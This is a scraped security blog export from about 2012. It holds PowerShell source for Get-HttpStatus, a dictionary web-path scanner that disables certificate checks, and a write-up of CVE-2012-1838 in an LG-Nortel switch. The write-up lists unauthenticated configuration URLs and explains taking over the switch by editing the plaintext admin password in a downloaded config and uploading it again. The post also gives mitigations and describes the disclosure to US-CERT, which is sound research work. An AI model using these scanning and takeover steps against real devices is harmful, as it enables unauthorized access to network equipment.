<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCMo1MjVOEyMByd4bLCIgfPuL1ZoroaisqBtAPJArKkSChtXdwmUBm53p0XX9uJLVF7O0qM6OTgIovfigcU1SDRYcC3yAzELNfzY40zs-8S4X1iCcbRNVjYyM-NIpkncN0_ExKCCWipDM/s1600/scan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCMo1MjVOEyMByd4bLCIgfPuL1ZoroaisqBtAPJArKkSChtXdwmUBm53p0XX9uJLVF7O0qM6OTgIovfigcU1SDRYcC3yAzELNfzY40zs-8S4X1iCcbRNVjYyM-NIpkncN0_ExKCCWipDM/s400/scan.PNG" width="400" /></a></div>
In this example, there is an interesting directory and file that is accessible without credentials. Lets check it out:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT0g1MXLtIyh7b7hAul21H9wmW9v8AWVmY8cS100TgtyFkCuU_ugcSNIEsgnoK3GEH87pnBcdEnzUvJ9Y1Vd9GOfmB0141URi1yW6w-an5cyMPXd3q16gJfM4Jvmpt8Js7VleM3MfMVGI/s1600/vulnerable_sharepoint.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT0g1MXLtIyh7b7hAul21H9wmW9v8AWVmY8cS100TgtyFkCuU_ugcSNIEsgnoK3GEH87pnBcdEnzUvJ9Y1Vd9GOfmB0141URi1yW6w-an5cyMPXd3q16gJfM4Jvmpt8Js7VleM3MfMVGI/s400/vulnerable_sharepoint.png" width="400" /></a></div>
<br />
It appears that we may have the ability to increase permissions by adding users to different groups on the server. That is definitely a security finding that could aid in a penetration test. As with other scripts and functions that are added to the PowerSploit project, the maintained version is available on the <a href="https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-HttpStatus.ps1">github site</a>.<br />
<br />
<b>Get-HttpStatus Function</b><textarea cols="60" name="Get-HttpStatus" readonly="readonly" rows="80" wrap="off">function Get-HttpStatus {
<#
.SYNOPSIS
PowerSploit Module - Get-HttpStatus
Returns the HTTP Status Codes and full URL for specified paths.
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
.DESCRIPTION
A script to check for the existence of a path or file on a webserver.
.PARAMETER Target
Specifies the remote web host either by IP or hostname.
.PARAMETER Path
Specifies the remost host.
.PARAMETER Port
Specifies the port to connect to.
.PARAMETER UseSSL
Use an SSL connection.
.EXAMPLE
PS > Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
.EXAMPLE
PS > Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
.NOTES
HTTP Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
Status Codes: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
.LINK
http://obscuresecurity.blogspot.com
#>
[CmdletBinding()] Param(
[Parameter(Mandatory = $True)] [String] $Target,
[Parameter()] [String] [ValidateNotNullOrEmpty()] $Path = '.\Dictionaries\admin.txt',
[Parameter()] [Int] $Port,
[Parameter()] [Switch] $UseSSL
)
if (Test-Path $Path) {
if ($UseSSL -and $Port -eq 0) {
# Default to 443 if SSL is specified but no port is specified
$Port = 443
} elseif ($Port -eq 0) {
# Default to port 80 if no port is specified
$Port = 80
}
$TcpConnection = New-Object System.Net.Sockets.TcpClient
Write-Verbose "Path Test Succeeded - Testing Connectivity"
try {
# Validate that the host is listening before scanning
$TcpConnection.Connect($Target, $Port)
} catch {
Write-Error "Connection Test Failed - Check Target"
$Tcpconnection.Close()
Return
}
$Tcpconnection.Close()
} else {
Write-Error "Path Test Failed - Check Dictionary Path"
Return
}
if ($UseSSL) {
$SSL = 's'
# Ignore invalid SSL certificates
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }
} else {
$SSL = ''
}
if (($Port -eq 80) -or ($Port -eq 443)) {
$PortNum = ''
} else {
$PortNum = ":$Port"
}
# Check Http status for each entry in the doctionary file
foreach ($Item in Get-Content $Path) {
$WebTarget = "http$($SSL)://$($Target)$($PortNum)/$($Item)"
$URI = New-Object Uri($WebTarget)
try {
$WebRequest = [System.Net.WebRequest]::Create($URI)
$WebResponse = $WebRequest.GetResponse()
$WebStatus = $WebResponse.StatusCode
$ResultObject += $ScanObject
$WebResponse.Close()
} catch {
$WebStatus = $Error[0].Exception.InnerException.Response.StatusCode
if ($WebStatus -eq $null) {
# Not every exception returns a StatusCode.
# If that is the case, return the Status.
$WebStatus = $Error[0].Exception.InnerException.Status
}
}
$Result = @{ Status = $WebStatus;
URL = $WebTarget}
$ScanObject = New-Object -TypeName PSObject -Property $Result
Write-Output $ScanObject
}
} </textarea><br />
<br />
Please check out the other dictionaries and let me know if you see any other use cases for this script. Thanks for checking this out and if you haven't bought your<a href="http://www.derbycon.com/"> DerbyCon</a> tickets yet, you should do so! If you are interested in PowerShell and security, <a href="http://www.darkoperator.com/">Carlos Perez</a> is teaching one of the first courses on the topic: "<a href="https://www.derbycon.com/training-courses/#intropowershell">Introduction to PowerShell for Security Professionals</a>" at this year's DerbyCon so sign up for it. I can't wait!<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com1tag:blogger.com,1999:blog-8453453300736107961.post-78955119233121868662012-07-31T17:37:00.001-04:002012-08-07T23:52:41.579-04:00Blackhat, BsidesLV and DefconI had a great time at Las Vegas security week this year and had the honor of presenting at Black Hat USA and BsidesLV. I appreciate everyone's support and feedback. I have never presented before and it was both exciting and humbling to talk to the attendees of both talks.<br />
<br />
I plan on posting all presentation slides <a href="http://www.obscuresecurity.blogspot.com/p/presentation-slides.html">here</a>, but you can find additional information related to the "Passing the Hash" talk at this <a href="http://passing-the-hash.blogspot.com/">blog</a>. <br />
<br />
Skip took the time to add audio to the demos from the talk. In case you missed the talk, view the <a href="http://www.obscuresecurity.blogspot.com/p/presentation-slides.html">slides</a> and the demos should give you a good idea of the main points.<br />
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="389" src="http://www.youtube.com/embed/XUn8u9iMDtY" width="480"></iframe>
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="389" src="http://www.youtube.com/embed/nElrc04LBGc" width="480"></iframe>
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="389" src="http://www.youtube.com/embed/XIhlkB1R96E" width="480"></iframe>
<br />
<br />
<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-25848372942731913142012-06-23T18:12:00.001-04:002012-06-23T18:32:24.762-04:00Vetting Devices with PowerShell & CVE-2012-1838A few months ago, I set out to replace an old Cisco switch with a managed gigabit switch. I settled on a 24-port LG-Nortel managed switch because it supported port mirroring, VLANs and costs under $200. Before I introduced the switch to my lab network, I decided to practice what I preach and vet the device.<br />
<br />
The first step was to read the manual and find out how the manufacturer recommends to configure the switch and more importantly secure it. The manual is available <a href="http://www.lgericsson.com.br/file/Download/LNGS24M_Manual_Usuario_Ingles.pdf">here</a>, but I will be referencing relevant sections with screenshots. According to the documentation, the only way to manage the switch is through the web interface:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB-gFKOoNSdeeT93L98rsh039RDmmFYHoj197BwxyXk5EBECmaOq3xE1wllnDm30zAv5ILZZZT1Eo2WpGE0fBJPZwXu1MsPRXH9TFWujxwUIC7LrFWDQXDcywVrx7FnJUEIqEuSKCnz8k/s1600/manual1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB-gFKOoNSdeeT93L98rsh039RDmmFYHoj197BwxyXk5EBECmaOq3xE1wllnDm30zAv5ILZZZT1Eo2WpGE0fBJPZwXu1MsPRXH9TFWujxwUIC7LrFWDQXDcywVrx7FnJUEIqEuSKCnz8k/s400/manual1.PNG" width="400" /></a></div>
<br />
It is extremely disconcerting that an enterprise networking appliance would allow management over an unencrypted port, but for it to be the only way to remotely manage the switch is shocking. Also, we will definitely want to change the default password, but for now lets focus on that note. That statement leads me to believe that the authentication and session management is fixed (probably by IP address) which could be a vulnerability. If proxies are used or admins share IPs or workstations with normal users, this condition could possibly be exploitable. Sometimes an attacker can find a way in just by reading the manual.<br />
<br />
Another interesting thing that I noticed in the manual was a reference to SNMP which was not listed as a feature of the switch in any other documentation:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiL3k6J2ulQ6Py0BvXy1DPzBUnTibyP7qKkJHSod4gCLdCfzFmC4KpVC0TgBkztLgmGhma0uf_uHrCF3VtO7l2911tedPo9wveXtKGyDUVFmmOLjvMD-PRQCNWxx0Vz77xaKzlY2amDbE/s1600/manual2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiL3k6J2ulQ6Py0BvXy1DPzBUnTibyP7qKkJHSod4gCLdCfzFmC4KpVC0TgBkztLgmGhma0uf_uHrCF3VtO7l2911tedPo9wveXtKGyDUVFmmOLjvMD-PRQCNWxx0Vz77xaKzlY2amDbE/s400/manual2.PNG" width="400" /></a></div>
<br />
The next step was to scan the switch to see if there were any other listening ports besides TCP 80. There appeared to be no surprises except for the aforementioned SNMP on UDP 161 was not listening.<br />
<br />
Since security was apparently not a part of the development life-cycle, I kept digging. The next step was to ensure that the switches firmware was updated. I verified that it was and downloaded the <a href="http://www.lgericsson.com.br/file/Download/LNGS24M_V2005_driver.zip">latest version</a> for analysis. I whipped up a PowerShell function for extracting strings from binary files, (it pales in comparison to the <a href="http://technet.microsoft.com/en-us/sysinternals/bb897439.aspx">Sysinternals Strings utility</a>) and extracted all lines containing "htm":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvUPxCN9ESa7CX-VqNxpqcnVmfrqxbessm3r_achyphenhyphen0tDQLdF6hXR7pMA0zN7Ev3Bmmp2HhJreuNOx_vxgI0vIiXIsoWoeHXYUZWKXYb-DnF6zJhhG5Pe5dbkXBYyETp-hox9h_4Bj2wm0/s1600/sort.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvUPxCN9ESa7CX-VqNxpqcnVmfrqxbessm3r_achyphenhyphen0tDQLdF6hXR7pMA0zN7Ev3Bmmp2HhJreuNOx_vxgI0vIiXIsoWoeHXYUZWKXYb-DnF6zJhhG5Pe5dbkXBYyETp-hox9h_4Bj2wm0/s400/sort.PNG" width="400" /></a></div>
<br />
After a bit of cleaning up, we now have a solid list of directories and files that we can check for without authenticating. I have used this simple process successfully many times and it will yield better results than a web scanner with a generic dictionary would.<br />
<br />
Next, we need a way to check to see which are valid files and paths. Get-HttpStatus is a PowerShell function to do just that: <br />
<br />
<br />
<b>Get-HttpStatus Function</b><textarea cols="60" name="Get-HttpStatus" readonly="readonly" rows="80" wrap="off">function Get-HttpStatus
{
<#
.NAME
Get-HttpStatus
.SYNOPSIS
Returns the numeric HTTP Status Code and full URL for specified paths.
Author: Chris Campbell (@obscuresec) www.obscuresec.com
License: GNU GPL v2
.LINK
http://obscuresecurity.blogspot.com
.SYNTAX
Get-HttpStatus -Target <string> -Path <string> [<CommonParameters>]
.DESCRIPTION
A script to check for the existence of a path or file on a webserver.
.PARAMETERS
-Target <string>
Specifies the remote web host either by IP or hostname.
Required? true
Position? 1
Default value 127.0.0.1
Accept pipeline input? false
Accept wildcard characters? false
-Path <string>
Specifies the remost host.
Required? true
Position? 2
Default value $pwd\dictionary.txt
Accept pipeline input? false
Accept wildcard characters? false
<CommonParameters>
This cmdlet supports the common parameters: Verbose, Debug,
ErrorAction, ErrorVariable, WarningAction, WarningVariable,
OutBuffer and OutVariable. For more information, type,
"get-help about_commonparameters".
-------------------------- EXAMPLE 1 --------------------------
C:\PS>Get-HttpStatus -Target www.example.com -Path c:\users\obscuresec\desktop\dictionary.txt | Select-Object {where StatusCode -eq 20*}
.Description
-----------
This is a PowerShell script to return the HTTP status codes for paths or files in a dictionary. It does not properly return errors.
Status Codes: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
HTTP Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
#>
param(
[string] $Target = '127.0.0.1',
[string] $Path = "$pwd\dictionary.txt"
)
#function to test connectivity to root of target site
function HttpCheck {
$TcpConnection = New-Object System.Net.Sockets.TcpClient
try {
$ConnectionResult = $false
$TcpConnection.Connect($Target, 80)
$ConnectionResult = $TcpConnection.Connected
}
catch {
$ConnectionResult = $false
Write-Error "Connection Test Failed - Check Target"
}
finally {
$Tcpconnection.Close()
}
}
#function to return the HTTP status code of the expanded URL
function HttpStatus {
param(
[string] $TargetUrl
)
try {
$WebTarget = "$TargetUrl"
$WebRequest = [System.Net.WebRequest]::Create($WebTarget)
$WebResponse = $WebRequest.GetResponse()
$WebStatus = [int]$WebResponse.StatusCode
Write-Output "$WebStatus `t $WebTarget"
$WebResponse.Close()
}
catch {
Write-Output "400 or 500 `t $WebTarget"
}
}
#Function using Foreach to Pipe contents of dictionary into HTTPStatus function
function ExpandDictionary {
try {
foreach ($Item in Get-Content $Path){
$TargetURL = "$WebRoot/$Item"
HttpStatus $TargetURL
}
}
catch {
Write-Output "Dictionary Expansion Failed"
}
}
#assign variable
$WebRoot = "http://$Target"
#run check function
HttpCheck
#run path function and sort
$ScanResults = ExpandDictionary
$SortedResults = $ScanResults | sort
Write-Output $SortedResults
}
</textarea><br />
<br />
Armed with our dictionary and Get-HttpStatus, lets see what status codes are returned from the switch without authenticating to it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBXigcaiWG3PH46Rmj_nDr51pcVGe5z_we75qgS8ou5ZhXmCcQnH7fWjvexcPBGRB7C9fOI3e2PDg0-1h4c6C4ALJFHeDbRoRIdmDLY3VZoe0wHuEmKnAnM2SBKIstKqED3EhmRStLV8c/s1600/scan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBXigcaiWG3PH46Rmj_nDr51pcVGe5z_we75qgS8ou5ZhXmCcQnH7fWjvexcPBGRB7C9fOI3e2PDg0-1h4c6C4ALJFHeDbRoRIdmDLY3VZoe0wHuEmKnAnM2SBKIstKqED3EhmRStLV8c/s400/scan.PNG" width="400" /></a></div>
<br />
<br />
We have lots of results, so the authentication mechanism used by the switch is obviously broken. The following URLs disclose nearly the entire configuration of the switch and are classified as information disclosure:<br />
<br />
<b>Information Disclosure URLs</b><textarea cols="60" name="Information Disclosure URLs" readonly="readonly" rows="32" wrap="off">http://192.168.2.10/dot1x/dot1x.html
http://192.168.2.10/dot1x/dot1xstat.html
http://192.168.2.10/igmps/igmpconf.html
http://192.168.2.10/igmps/igmpstat.html
http://192.168.2.10/ports/ports_bsc.html
http://192.168.2.10/ports/ports_config.html
http://192.168.2.10/ports/ports_mir.html
http://192.168.2.10/ports/ports_rl.html
http://192.168.2.10/ports/veriphystat.html
http://192.168.2.10/qos/qos_conf.html
http://192.168.2.10/rstp/rstp.html
http://192.168.2.10/rstp/rstpstatus.html
http://192.168.2.10/security/security.html
http://192.168.2.10/security/security_acl.html
http://192.168.2.10/security/security_port.html
http://192.168.2.10/status/status_ov.html
http://192.168.2.10/status/status_stats.html
http://192.168.2.10/system/system_cntconfig.html
http://192.168.2.10/system/system_ls.html
http://192.168.2.10/system/system_name.html
http://192.168.2.10/system/system_smac.html
http://192.168.2.10/system/system_smac_setup.html
http://192.168.2.10/system/system_upok.html
http://192.168.2.10/trunks/lacp.html
http://192.168.2.10/trunks/lacpstatus.html
http://192.168.2.10/trunks/trunks_config.html
http://192.168.2.10/trunks/trunks_mem.html
http://192.168.2.10/trunks/trunks_rl.html
http://192.168.2.10/vlans/vlan_mconf.html
http://192.168.2.10/vlans/vlan_pconf.html
http://192.168.2.10/vlans/vlan_setup.html
</textarea><br />
<br />
From an attacker's perspective, there are several more interesting URLs that are accessible without authentication:<br />
<br />
<b>Potentially Exploitable URLs</b><textarea cols="60" name="Exploitable URLs" readonly="readonly" rows="7" style="height: 119px; width: 508px;" wrap="off">http://192.168.2.10/snmp/snmp.html
http://192.168.2.10/sysreboot.html
http://192.168.2.10/system/cfgload.htm
http://192.168.2.10/system/system_config.html
http://192.168.2.10/system/system_configfrm.html
http://192.168.2.10/system/system_pswd.html
</textarea><br />
<br />
The first in the list seemed really promising:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4SqDoqZGjLqSq537QnbebLeWHnpoXmWMV86Rl6DKk4xHaUAFiJuBY0fFq8K9YD55dbfkpGDtXlOkqBc0XhGTCkc7exXg7eNTVkJIpNHSBUzwcIHvX6LuHEGKquxbyUs_SXUu4phfLJt8/s1600/snmp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4SqDoqZGjLqSq537QnbebLeWHnpoXmWMV86Rl6DKk4xHaUAFiJuBY0fFq8K9YD55dbfkpGDtXlOkqBc0XhGTCkc7exXg7eNTVkJIpNHSBUzwcIHvX6LuHEGKquxbyUs_SXUu4phfLJt8/s400/snmp.png" width="400" /></a></div>
Unfortunately, the switch returns an error when you hit the apply button. Lets look at another of the files and see if there is an easier way to compromise the switch without authenticating.<br />
<br />
http://192.168.2.10/system/cfgload.htm<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
This page contains an area for uploading and downloading the switch configuration. Downloading the current configuration could be very handy and in this case its aided by the fact that the single admin password is stored in a plain-text string:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8lyYrTQuUEzWZK55pyr3LY3aVyTpkbIPq1e1VVjtDL3Gf55bZnAvM33f2TbaaSj7LrCubuzxjH91EWh9pYbs-YgxlKDxonK59KpfRcfGu0HvnIHGYsVxbA3rkFU0qZZd_s1ARRgzFTxk/s1600/config_password.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8lyYrTQuUEzWZK55pyr3LY3aVyTpkbIPq1e1VVjtDL3Gf55bZnAvM33f2TbaaSj7LrCubuzxjH91EWh9pYbs-YgxlKDxonK59KpfRcfGu0HvnIHGYsVxbA3rkFU0qZZd_s1ARRgzFTxk/s400/config_password.PNG" width="400" /></a></div>
Now we can change the password with a hex editor and upload the altered configuration without ever authenticating!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWAUi2XQjcvF1xf_CMYwCrEaqUO-OCKuF7hpQQ9tf6R1wAza39ZrSHC3Xvfe0NGfnfiJwZpYBQDfgDEqcZAQyjhoBm31-XYTZVLF_oQ13BToaWg2MzaknIo1KikPQvWpvg3mj_aFT0zE/s1600/configDL.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWAUi2XQjcvF1xf_CMYwCrEaqUO-OCKuF7hpQQ9tf6R1wAza39ZrSHC3Xvfe0NGfnfiJwZpYBQDfgDEqcZAQyjhoBm31-XYTZVLF_oQ13BToaWg2MzaknIo1KikPQvWpvg3mj_aFT0zE/s320/configDL.PNG" width="320" /></a></div>
The attacker could then log into the switch with the password that they placed in the config file.<br />
<br />
So how do we secure this obviously vulnerable switch or is it hopeless? We can start by ignoring the manual:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrqJoKonLB3Q25Xz8ToeFR5X4qBxh4FOQhCr0qVTmWaFftW7PJ5oGRAMUCcHKUTO-dBuM08mOxzRg12kLPxcqLzJNCR6udnMt_uN2KytuUIrA9bH__J7Fdm5Vb7lgFw9K8MmZlMOyfJTU/s1600/manual3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrqJoKonLB3Q25Xz8ToeFR5X4qBxh4FOQhCr0qVTmWaFftW7PJ5oGRAMUCcHKUTO-dBuM08mOxzRg12kLPxcqLzJNCR6udnMt_uN2KytuUIrA9bH__J7Fdm5Vb7lgFw9K8MmZlMOyfJTU/s400/manual3.PNG" width="400" /></a></div>
Since you have to leave one port as a member of VLAN 1, designate one as the "admin" port and put every other port in a different VLAN. Use the "admin" port to configure the switch (VLANs, port mirroring for your IDS, etc...) and then remove the cable or plug it into a completely out-of-band admin network. You won't be able to remotely manage the switch, but hopefully neither will anyone else. It is possible to secure vulnerable systems if you know what the vulnerabilities are and mitigate risk effectively.<br />
<br />
I also verified that the switch maps an IP address to an authenticated session for exactly 5 minutes. Even if you log out, the switch will allow anyone using the previously authenticated IP to connect as the administrative user for the remainder of the 5 minutes. The results above were discovered using an IP that had not been used to log in to the switch.<br />
<br />
These vulnerabilities (lame as they are) were disclosed through the <a href="http://www.kb.cert.org/vuls/id/523027">US-CERT</a> (since LG gave me the run-around for several weeks and Nortel didn't respond either) and were assigned <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1838">CVE-2012-1838</a>. The advisory was released early because LG has decided that they are no longer supporting this or similar models of switches.<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com2